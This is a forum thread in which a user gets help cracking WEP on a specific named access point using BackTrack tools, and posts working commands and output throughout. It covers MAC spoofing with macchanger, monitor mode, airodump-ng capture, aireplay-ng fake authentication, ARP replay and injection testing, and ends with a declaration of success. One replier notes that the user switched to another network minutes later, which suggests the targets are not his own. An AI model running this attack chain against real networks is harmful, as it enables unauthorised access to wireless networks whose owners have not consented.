As did I, but I guess it would have been too much work to simply type out the commands and error messages. As compared to spam 16 different threads and take screenshots of the whole processI've already PM'd lovena once about that, seems the message didn't get through....
Interesting by the way to see how he switched over to another AP (SAGEM_5B99) with another bssid, different channel and much lower PWR rating just 8 minutes after his initial attempt with Rami'z World. It couldn't be that you are playing with someone else's toys now could it Lovena.2008?![]()
-Monkeys are like nature's humans.
I have the understanding, that you also need another "\" escape character for the space
as well? am I right?
lovena.2008, Pictures are not search able on a forum please use "COPY and PASTE" ofaireplay-ng -1 0 -e 'Rxxi\'z\ World' -a 00:xx:C9:xx:CB -h 00:11:22:33:44:55 wlan0
both your commands and your results, thank you!
««EDocTooR»»
Actually it shouldn't be included since we use the ' symbols at each end of the AP name. The only reason we need to include one \ is that aireplay-ng otherwise will assume that the name is only Rxxi.I have the understanding, that you also need another "\" escape character for the space
as well? am I right?
-Monkeys are like nature's humans.
Great & Thanks for help ««EDocTooR»» It's work fine..
This right way:
(( -e Rami\'z\ World ))
My Command its:
bt ~ # ifconfig wlan0 down
bt ~ # macchanger -m 00:11:22:33:44:55 wlan0
Current MAC: 00:c0:ca:1a:ed:05 (Alfa, Inc.)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
bt ~ # ifconfig wlan0 up
bt ~ # airmon-ng start wlan0 11
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)
bt ~ # airodump-ng --bssid 00:16:B6:C9:0B:CB -c 11 -w new wlan0
So far everything is fine
then.. (in new shell - Konsole)
bt ~ # aireplay-ng -1 0 -e Rami\'z\ World -a 00:16:B6:C9:0B:CB -h 00:11:22:33:44:55 wlan0
12:06:02 Waiting for beacon frame (BSSID: 00:16:B6:C9:0B:CB) on channel 11
12:06:02 Sending Authentication Request (Open System)
12:06:02 Authentication successful
12:06:02 Sending Association Request [ACK]
12:06:02 Association successful :-)
bt ~ # aireplay-ng -3 -e Rami\'z\ World -b 00:16:B6:C9:0B:CB -h 00:11:22:33:44:55 wlan0
12:06:19 Waiting for beacon frame (BSSID: 00:16:B6:C9:0B:CB) on channel 11
Saving ARP requests in replay_arp-0612-120619.cap
You should also start airodump-ng to capture replies.
Read 3205 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
bt ~ # aireplay-ng -9 -e Rami\'z\ World -b 00:16:B6:C9:0B:CB -h 00:11:22:33:44:55 wlan0
12:08:09 Waiting for beacon frame (ESSID: Rami'z World) on channel 11
Found BSSID "00:16:B6:C9:0B:CB" to given ESSID "Rami'z World".
12:08:09 Trying broadcast probe requests...
12:08:09 Injection is working!
12:08:10 Found 1 AP
12:08:10 Trying directed probe requests...
12:08:10 00:16:B6:C9:0B:CB - channel: 11 - 'Rami'z World'
12:08:15 Ping (min/avg/max): 0.237ms/125.062ms/200.009ms Power:19.76
12:08:15 25/30: 83%
bt ~ #
What is the problem and what i do
and I am sorry to Overstaying...
There needs to be someone else actually sending the ARP requests for you to be able to intercept them and replay them successfully using this attack. There are different approaches that can be used on a WEP network with no clients currently connected to it.Read 3205 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
-Monkeys are like nature's humans.
Thank you very much for all
Special thanks to
-=Xploitz=-
for this great Tutorial
http://forums.remote-exploit.org/showthread.php?t=7872
And thanks to this magnificent site & this great CD (Back Track)
Mission ended in success!!
Greetings and Good Luck For All